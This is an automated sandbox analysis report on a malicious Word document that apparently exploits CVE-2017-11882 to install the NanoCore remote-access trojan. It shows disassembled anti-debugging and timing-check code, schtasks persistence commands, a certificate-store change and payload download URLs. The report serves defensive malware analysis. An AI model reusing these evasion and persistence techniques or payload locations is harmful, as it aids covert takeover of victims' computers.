Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	RDTSC instruction interceptor: First address: 0000000000566A3C second address: 0000000000566B00 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b mov eax, dword ptr [esp+18h] 0x0000000f jmp 00007F085CED7292h 0x00000011 cmp bl, FFFFFFE7h 0x00000014 mov byte ptr [eax], FFFFFF90h 0x00000017 jmp 00007F085CED7292h 0x00000019 cmp ax, dx 0x0000001c mov eax, dword ptr [esp+1Ch] 0x00000020 mov byte ptr [eax], 0000006Ah 0x00000023 jmp 00007F085CED7292h 0x00000025 jmp 00007F085CED729Eh 0x00000027 mov byte ptr [eax+01h], 00000000h 0x0000002b mov byte ptr [eax+02h], FFFFFFB8h 0x0000002f jmp 00007F085CED7292h 0x00000031 test ax, cx 0x00000034 mov edx, dword ptr [ebp+0000013Ch] 0x0000003a mov dword ptr [eax+03h], edx 0x0000003d jmp 00007F085CED7292h 0x0000003f cmp dx, cx 0x00000042 jmp 00007F085CED7292h 0x00000044 pushad 0x00000045 lfence 0x00000048 rdtsc
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	RDTSC instruction interceptor: First address: 0000000000566B00 second address: 0000000000566BBF instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b mov byte ptr [eax+07h], FFFFFFFFh 0x0000000f jmp 00007F085CF4DEA2h 0x00000011 cmp bl, 00000038h 0x00000014 mov byte ptr [eax+08h], FFFFFFD0h 0x00000018 jmp 00007F085CF4DEA2h 0x0000001a cmp ax, dx 0x0000001d mov byte ptr [eax+09h], FFFFFFC2h 0x00000021 mov byte ptr [eax+0Ah], 00000004h 0x00000025 mov byte ptr [eax+0Bh], 00000000h 0x00000029 jmp 00007F085CF4DEA2h 0x0000002b jmp 00007F085CF4DEAEh 0x0000002d jmp 00007F085CF4DEA2h 0x0000002f test ax, cx 0x00000032 mov eax, ebx 0x00000034 jmp 00007F085CF4DEA2h 0x00000036 cmp dx, cx 0x00000039 add eax, dword ptr [esp+08h] 0x0000003d jmp 00007F085CF4DEA2h 0x0000003f pushad 0x00000040 lfence 0x00000043 rdtsc
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	RDTSC instruction interceptor: First address: 0000000000566BBF second address: 0000000000566BBF instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b inc ebx 0x0000000c cmp ebx, eax 0x0000000e je 00007F085CED74A5h 0x00000014 jmp 00007F085CED7292h 0x00000016 cmp bl, 00000041h 0x00000019 cmp byte ptr [ebx], FFFFFFB8h 0x0000001c jne 00007F085CED723Eh 0x0000001e jmp 00007F085CED7292h 0x00000020 pushad 0x00000021 lfence 0x00000024 rdtsc
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	RDTSC instruction interceptor: First address: 000000000056767F second address: 00000000005676BA instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b mov eax, dword ptr [edi+00005000h] 0x00000011 cmp dword ptr [eax+04h], 00000000h 0x00000015 jne 00007F085CF4DFE6h 0x0000001b cmp dword ptr [eax+08h], 00000000h 0x0000001f jne 00007F085CF4DFDCh 0x00000025 jmp 00007F085CF4DEA2h 0x00000027 pushad 0x00000028 lfence 0x0000002b rdtsc
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	RDTSC instruction interceptor: First address: 0000000000560FE0 second address: 0000000000560FE0 instructions:
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	RDTSC instruction interceptor: First address: 0000000000561093 second address: 0000000000561093 instructions:
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	RDTSC instruction interceptor: First address: 0000000000561166 second address: 0000000000561166 instructions:
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	RDTSC instruction interceptor: First address: 0000000000561216 second address: 0000000000561216 instructions:
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	RDTSC instruction interceptor: First address: 0000000000564496 second address: 0000000000564496 instructions:
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	RDTSC instruction interceptor: First address: 00000000005645F2 second address: 00000000005645F2 instructions:
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	RDTSC instruction interceptor: First address: 000000000056220E second address: 000000000056220E instructions:
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	RDTSC instruction interceptor: First address: 0000000000562398 second address: 000000000056243D instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a jmp 00007F085CF4DEA2h 0x0000000c cmp ax, 00002355h 0x00000010 call 00007F085CF4E4FBh 0x00000015 cmp dword ptr [edi+00000818h], 00000000h 0x0000001c je 00007F085CF4DF75h 0x00000022 ret 0x00000023 test edx, ecx 0x00000025 mov eax, dword ptr fs:[00000030h] 0x0000002b mov eax, dword ptr [eax+0Ch] 0x0000002e mov eax, dword ptr [eax+0Ch] 0x00000031 jmp 00007F085CF4DEA2h 0x00000033 test dx, dx 0x00000036 mov ecx, dword ptr [edi+00000808h] 0x0000003c jmp 00007F085CF4DE97h 0x0000003e mov dword ptr [eax+20h], ecx 0x00000041 jmp 00007F085CF4DEA2h 0x00000043 cmp ah, ch 0x00000045 mov esi, dword ptr [edi+00000800h] 0x0000004b jmp 00007F085CF4DEA2h 0x0000004d fnop 0x0000004f mov dword ptr [eax+18h], esi 0x00000052 add esi, dword ptr [edi+00000850h] 0x00000058 mov dword ptr [eax+1Ch], esi 0x0000005b jmp 00007F085CF4DEA2h 0x0000005d pushad 0x0000005e rdtsc
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	RDTSC instruction interceptor: First address: 000000000056243D second address: 00000000005624DF instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a jmp 00007F085CED7292h 0x0000000c cmp ax, 0000D992h 0x00000010 test edx, ecx 0x00000012 cmp dword ptr [ebp+70h], 01h 0x00000016 je 00007F085CED73FCh 0x0000001c mov esi, edi 0x0000001e add esi, 00001000h 0x00000024 xor ecx, ecx 0x00000026 push ecx 0x00000027 jmp 00007F085CED7292h 0x00000029 test dx, dx 0x0000002c push edi 0x0000002d mov eax, ebp 0x0000002f add eax, 0000009Ch 0x00000034 push eax 0x00000035 call 00007F085CED7915h 0x0000003a jmp 00007F085CED7292h 0x0000003c jmp 00007F085CED729Ah 0x0000003e test ch, ch 0x00000040 cmp dword ptr [esi+24h], E0000020h 0x00000047 je 00007F085CED7354h 0x0000004d cmp dword ptr [esi+24h], 60000020h 0x00000054 je 00007F085CED73C3h 0x0000005a mov ebx, 00000020h 0x0000005f jmp 00007F085CED7296h 0x00000061 ret 0x00000062 push ebx 0x00000063 jmp 00007F085CED7292h 0x00000065 cmp ah, ch 0x00000067 mov eax, esi 0x00000069 jmp 00007F085CED7292h 0x0000006b fnop 0x0000006d add eax, 08h 0x00000070 push eax 0x00000071 mov eax, dword ptr [edi+00000800h] 0x00000077 jmp 00007F085CED7292h 0x00000079 pushad 0x0000007a rdtsc
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	RDTSC instruction interceptor: First address: 00000000005624DF second address: 00000000005624DF instructions:
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	RDTSC instruction interceptor: First address: 0000000000562599 second address: 0000000000562599 instructions:

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Code function: 5_2_005674F1 rdtsc

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Thread delayed: delay time: 922337203685477

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1916	Thread sleep time: -240000s >= -30000s
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1916	Thread sleep time: -60000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe TID: 2984	Thread sleep time: -360000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe TID: 152	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe TID: 1976	Thread sleep time: -80000s >= -30000s
Source: C:\Windows\System32\taskeng.exe TID: 2300	Thread sleep time: -60000s >= -30000s
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe TID: 532	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe TID: 1840	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Last function: Thread delayed

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	File opened: C:\Windows\Microsoft.NET\Framework\
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	File opened: C:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dll
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	File opened: C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\6f4f738362752c5d3a2c9234d604784d\System.Drawing.ni.dll
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	File opened: C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dll
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	File opened: C:\Windows\Microsoft.NET\

Source: RegAsm.exe	Binary or memory string: u-ga\qemu-ga.exe
Source: RegAsm.exe	Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Process information queried: ProcessInformation

Anti Debugging:

Hides threads from debuggers

Show sources

Source: C:\Users\Public\69577.exe	Thread information set: HideFromDebugger
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Thread information set: HideFromDebugger
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Thread information set: HideFromDebugger

Source: C:\Users\Public\69577.exe	Process queried: DebugPort
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process queried: DebugPort

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Code function: 5_2_005674F1 rdtsc

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Code function: 5_2_00564845 LdrInitializeThunk,

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_00566852 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_00565851 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_005668D5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_005668C1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_00566899 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_00566888 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_00565D79 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_005637B7 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_005637BD mov eax, dword ptr fs:[00000030h]

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Process token adjusted: Debug

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

Writes to foreign memory regions

Show sources

Source: C:\Users\Public\69577.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe base: 560000

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\69577.exe C:\Users\Public\69577.exe
Source: C:\Users\Public\69577.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe C:\Users\Public\69577.exe
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'SMTP Service' /xml 'C:\Users\user\AppData\Local\Temp\tmp1A35.tmp'
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'SMTP Service Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp678.tmp'
Source: C:\Windows\System32\taskeng.exe	Process created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe 'C:\Program Files (x86)\SMTP Service\smtpsvc.exe' 0

Source: taskeng.exe, 0000000D.00000002.2342665545.0000000000760000.00000002.00000001.sdmp, filename1.exe, 00000013.00000002.2347995160.0000000000960000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: taskeng.exe, 0000000D.00000002.2342665545.0000000000760000.00000002.00000001.sdmp, filename1.exe, 00000013.00000002.2347995160.0000000000960000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: taskeng.exe, 0000000D.00000002.2342665545.0000000000760000.00000002.00000001.sdmp, filename1.exe, 00000013.00000002.2347995160.0000000000960000.00000002.00000001.sdmp	Binary or memory string: !Progman

Language, Device and Operating System Detection:

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Code function: 5_2_00562FD2 cpuid

Source: C:\Users\Public\69577.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings:

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 Blob

Jump to behavior

Stealing of Sensitive Information:

Yara detected Nanocore RAT

Show sources

Source: Yara match	File source: 00000005.00000002.2342304047.0000000000090000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 2428, type: MEMORY
Source: Yara match	File source: 5.2.RegAsm.exe.90000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegAsm.exe.94629.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegAsm.exe.90000.2.unpack, type: UNPACKEDPE

Remote Access Functionality:

Detected Nanocore Rat

Show sources

Source: RegAsm.exe, 00000005.00000002.2342294404.0000000000080000.00000004.00000001.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: RegAsm.exe, 00000005.00000002.2342294404.0000000000080000.00000004.00000001.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll

Yara detected Nanocore RAT

Show sources

Source: Yara match	File source: 00000005.00000002.2342304047.0000000000090000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 2428, type: MEMORY
Source: Yara match	File source: 5.2.RegAsm.exe.90000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegAsm.exe.94629.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegAsm.exe.90000.2.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Spearphishing Link1	Exploitation for Client Execution13	Scheduled Task/Job1	Process Injection112	Disable or Modify Tools11	Input Capture11	File and Directory Discovery2	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Ingress Tool Transfer2	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Command and Scripting Interpreter1	Registry Run Keys / Startup Folder1	Scheduled Task/Job1	Obfuscated Files or Information1	LSASS Memory	System Information Discovery313	Remote Desktop Protocol	Input Capture11	Exfiltration Over Bluetooth	Encrypted Channel12	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Scheduled Task/Job1	Logon Script (Windows)	Registry Run Keys / Startup Folder1	Software Packing1	Security Account Manager	Query Registry1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Standard Port1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Masquerading122	NTDS	Security Software Discovery621	Distributed Component Object Model	Input Capture	Scheduled Transfer	Remote Access Software1	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Virtualization/Sandbox Evasion23	LSA Secrets	Virtualization/Sandbox Evasion23	SSH	Keylogging	Data Transfer Size Limits	Non-Application Layer Protocol2	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Process Injection112	Cached Domain Credentials	Process Discovery2	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Application Layer Protocol13	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Hidden Files and Directories1	DCSync	Remote System Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
PO AAN2102002-V020.doc	28%	ReversingLabs	Document-Office.Exploit.CVE-2017-11882

Dropped Files

Source	Detection	Scanner	Link
C:\Program Files (x86)\SMTP Service\smtpsvc.exe	0%	Virustotal	Browse
C:\Program Files (x86)\SMTP Service\smtpsvc.exe	0%	Metadefender	Browse
C:\Program Files (x86)\SMTP Service\smtpsvc.exe	0%	ReversingLabs

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
5.2.RegAsm.exe.90000.2.unpack	100%	Avira	TR/NanoCore.fadte		Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	0%	URL Reputation	safe
http://ocsp.entrust.net03	0%	URL Reputation	safe
http://ocsp.entrust.net03	0%	URL Reputation	safe
http://ocsp.entrust.net03	0%	URL Reputation	safe
http://ocsp.entrust.net03	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.diginotar.nl/cps/pkioverheid0	0%	URL Reputation	safe
http://www.diginotar.nl/cps/pkioverheid0	0%	URL Reputation	safe
http://www.diginotar.nl/cps/pkioverheid0	0%	URL Reputation	safe
http://www.diginotar.nl/cps/pkioverheid0	0%	URL Reputation	safe
http://ocsp.entrust.net0D	0%	URL Reputation	safe
http://ocsp.entrust.net0D	0%	URL Reputation	safe
http://ocsp.entrust.net0D	0%	URL Reputation	safe
http://ocsp.entrust.net0D	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
bit.ly	67.199.248.11	true	false	high
teknik.io	5.79.72.163	true	false	high
onedrive.live.com	unknown	unknown	false	high
cbavwq.bl.files.1drv.com	unknown	unknown	false	high
u.teknik.io	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://bit.ly/3pNzHgj	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	RegAsm.exe, 00000005.00000002.2354794151.0000000000A98000.00000004.00000020.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.	taskeng.exe, 0000000D.00000002.2342784593.0000000001B60000.00000002.00000001.sdmp	false		high
https://cbavwq.bl.files.1drv.com/DQ	RegAsm.exe, 00000005.00000002.2354794151.0000000000A98000.00000004.00000020.sdmp	false		high
https://onedrive.live.com/download?cid=F57CEB019EB26E7D&resid=F57CEB019EB26E7D%21106&authkey=AHaSu1X	RegAsm.exe, RegAsm.exe, 00000005.00000002.2342821040.0000000000562000.00000040.00000001.sdmp, RegAsm.exe, 00000005.00000002.2351405264.0000000000A4C000.00000004.00000020.sdmp	false		high
http://crl.entrust.net/server1.crl0	RegAsm.exe, 00000005.00000002.2354794151.0000000000A98000.00000004.00000020.sdmp	false		high
http://ocsp.entrust.net03	RegAsm.exe, 00000005.00000002.2354794151.0000000000A98000.00000004.00000020.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://u.teknik.io/TFppy.txt	3pNzHgj[1].htm.2.dr	false		high
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	RegAsm.exe, 00000005.00000002.2354794151.0000000000A98000.00000004.00000020.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.%s.comPA	taskeng.exe, 0000000D.00000002.2342784593.0000000001B60000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	low
http://www.diginotar.nl/cps/pkioverheid0	RegAsm.exe, 00000005.00000002.2354794151.0000000000A98000.00000004.00000020.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://ocsp.entrust.net0D	RegAsm.exe, 00000005.00000002.2354794151.0000000000A98000.00000004.00000020.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://cbavwq.bl.files.1drv.com/y4m3v2kEpIV8FbxWjD8IYOSGc9eY7yGumgM5fcT1ikVolWrnqtFykMCYtt6EVe-wNwa	RegAsm.exe, 00000005.00000002.2354794151.0000000000A98000.00000004.00000020.sdmp, RegAsm.exe, 00000005.00000002.2354281853.0000000000A86000.00000004.00000020.sdmp	false		high
https://secure.comodo.com/CPS0	RegAsm.exe, 00000005.00000002.2354794151.0000000000A98000.00000004.00000020.sdmp	false		high
https://cbavwq.bl.files.1drv.com/O	RegAsm.exe, 00000005.00000002.2354794151.0000000000A98000.00000004.00000020.sdmp	false		high
http://crl.entrust.net/2048ca.crl0	RegAsm.exe, 00000005.00000002.2354794151.0000000000A98000.00000004.00000020.sdmp	false		high
https://onedrive.live.com/	RegAsm.exe, 00000005.00000002.2351405264.0000000000A4C000.00000004.00000020.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
194.5.98.182	unknown	Netherlands	208476	DANILENKODE	true
67.199.248.10	unknown	United States	396982	GOOGLE-PRIVATE-CLOUDUS	true
5.79.72.163	unknown	Netherlands	60781	LEASEWEB-NL-AMS-01NetherlandsNL	false

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	357103
Start date:	24.02.2021
Start time:	07:57:17
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 12m 25s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	PO AAN2102002-V020.doc
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	20
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.expl.evad.winDOC@16/25@6/3
EGA Information:	Failed
HDC Information:	Successful, ratio: 79.4% (good quality ratio 35.3%) Quality average: 22.7% Quality standard deviation: 30.5%
HCA Information:	Successful, ratio: 98% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .doc Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer
